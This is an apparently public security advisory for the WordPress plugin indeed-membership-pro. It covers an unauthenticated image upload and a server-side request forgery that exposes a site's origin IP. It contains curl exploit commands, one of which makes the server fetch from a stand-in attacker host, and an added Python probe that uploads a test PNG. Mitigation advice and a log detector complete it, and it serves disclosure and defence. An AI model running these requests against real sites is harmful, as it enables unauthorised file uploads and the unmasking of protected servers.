WordPress plugin: indeed-membership-pro <=7.5 arbitrary image upload
##Abstract
Ultimate Membership Pro (plugin slug indeed-membership-pro) describes itself as "the well known and the best WordPress Membership Plugin that allows you to create and work with multi-level exclusive access for your Members based on simple Free packages or Paid packages."[1]
The file public/ajax-upload.php is reachable directly over HTTP and performs neither a capability check nor a login check on the request, so an anonymous visitor can do two things they should not be able to do:
##Vulnerability #1 - Unauthenticated arbitrary image upload
Simply POST an image file in the multipart field ihc_file and the plugin stores it under wp-content/uploads and returns the public URL of the stored file:
~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}
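The same check as a small script, added here as an example and not part of the original advisory. It generates a valid 1x1 PNG in memory (so no image file is needed and a getimagesize()-style validation on the server would still pass), posts it as ihc_file without any cookie or nonce, and treats a reply in the JSON shape shown above (an integer id plus a url) as confirmation that an unauthenticated upload was stored. The endpoint path and response format are taken from the advisory; the User-Agent string and the probe file name are arbitrary choices.

```python
import json
import struct
import urllib.error
import urllib.request
import uuid
import zlib

# Path of the affected endpoint, as given in the advisory.
ENDPOINT = "/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php"


def png_chunk(tag, data):
    """Length-prefixed PNG chunk with the CRC-32 over tag+data, as the PNG spec requires."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def make_png(width=1, height=1):
    """Build a minimal valid 8-bit RGB PNG in memory (all-black pixels).

    Constructed here so the probe needs no image file on disk; any image
    decoder should accept it, which matters if the plugin validates uploads
    with getimagesize() or similar before storing them.
    """
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # One scanline per row: filter byte 0 followed by `width` RGB triples.
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return (b"\x89PNG\r\n\x1a\n"
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw))
            + png_chunk(b"IEND", b""))


def build_multipart(field, filename, data, content_type="image/png"):
    """Encode one file as multipart/form-data; returns (Content-Type header value, body)."""
    boundary = uuid.uuid4().hex
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def parse_upload_response(text):
    """Return the stored file's URL when the reply has the advisory's JSON shape, else None."""
    try:
        obj = json.loads(text)
    except ValueError:
        return None
    if isinstance(obj, dict) and isinstance(obj.get("id"), int) and isinstance(obj.get("url"), str):
        return obj["url"]
    return None


def check_target(base_url, timeout=10):
    """POST a generated 1x1 PNG with no cookies or nonce.

    A JSON reply carrying id and url means the endpoint stored a file for an
    unauthenticated request, i.e. the site is affected. A 403/404 (for example
    from a web-server block on the path) or a non-JSON reply returns None.
    """
    ctype, body = build_multipart("ihc_file", "probe.png", make_png())
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=body,
        headers={"Content-Type": ctype, "User-Agent": "ihc-upload-check/1.0"},  # UA is arbitrary
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_upload_response(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError:
        return None


if __name__ == "__main__":
    import sys
    stored = check_target(sys.argv[1])
    print("affected, file stored at " + stored if stored else "no upload stored (not affected or blocked)")
```

Run it as `python3 check.py https://vulnerable.host`. Note that a successful probe leaves a file in the target's uploads directory, so only run it against hosts you are authorised to test, and record the returned url so the file can be removed afterwards.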
##Vulnerability #2 - Determine IP address of origin (not present in all versions)
In addition to cropping, rotating and resizing an image of your choosing, on versions that have the imgUrl feature (7.4.2 and later at least) you can point imgUrl at any URL and the server will fetch it for you (a server-side request forgery). Pointing it at a host you control reveals the IP address of the origin server even when the site sits behind a third-party WAF or CDN such as Fastly, Cloudflare or Sucuri, because the outbound request comes from the origin, not from the proxy:
curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
##Solutions/workarounds
None from the vendor; uninstall the plugin until the developer fixes it. If it cannot be removed immediately, denying direct HTTP access to wp-content/plugins/indeed-membership-pro/public/ajax-upload.php at the web server (a 403 for that path) closes both issues described here, at the cost of the plugin's front-end image upload feature. That interim block is this editor's suggestion and has not been verified against the plugin's other code paths.
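Until the plugin is removed, requests to the endpoint are worth watching for in the web server's access log, since both the upload and the imgUrl fetch go through it. The following detector is an added example, not part of the advisory: it parses combined-format log lines, keeps POSTs to ajax-upload.php, and flags those with no Referer as direct-client activity. The sample lines are constructed for the example; the "no Referer means a direct client such as curl" rule is a heuristic assumption (the plugin's own front-end would normally send a Referer from a page on the site), not something the advisory states.

```python
import re
from collections import Counter

# Path of the affected endpoint, as given in the advisory.
ENDPOINT = "/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php"

# Combined log format (Apache/nginx default):
#   ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines for this example; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Feb/2019:10:01:02 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 143 "-" "curl/7.64.0"
198.51.100.23 - - [26/Feb/2019:10:01:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Feb/2019:10:01:09 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 180 "-" "curl/7.64.0"
192.0.2.44 - - [26/Feb/2019:10:02:00 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 150 "https://vulnerable.host/account/" "Mozilla/5.0"
198.51.100.23 - - [26/Feb/2019:10:02:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 31 "https://vulnerable.host/account/" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_hits(log_text):
    """Return every POST to ajax-upload.php, each tagged with whether it looks like a direct client.

    Query strings are stripped before matching so "?x=1" variants are not missed.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith(ENDPOINT):
            # Heuristic (assumption): the plugin's front-end sends a Referer from the
            # site; an empty or "-" Referer points at a direct client such as curl.
            rec["direct"] = rec["referer"] in ("", "-")
            hits.append(rec)
    return hits


def hits_by_ip(hits):
    """Count hits per source IP; repeated direct hits from one address stand out first."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_upload_hits(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} direct={h["direct"]} ua={h["ua"]}')
    print(hits_by_ip(found))
```

On a real system feed the log file's contents to find_upload_hits() instead of SAMPLE_LOG. Because POST bodies are not logged, the output cannot tell an upload from an imgUrl fetch; for the latter, an outbound-connection log or egress firewall entries from the origin at the same timestamps are the corroborating evidence.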
##Disclosure Timeline
- 2019-01-23: Vendor contacted (Website contact form, Facebook) - no response.
- 2019-02-04: Vendor contacted again (Envato contact form) - no response.
- 2019-02-25: Heads-up posted to #wordpress on Freenode.
- 2019-02-26: Public disclosure.
##References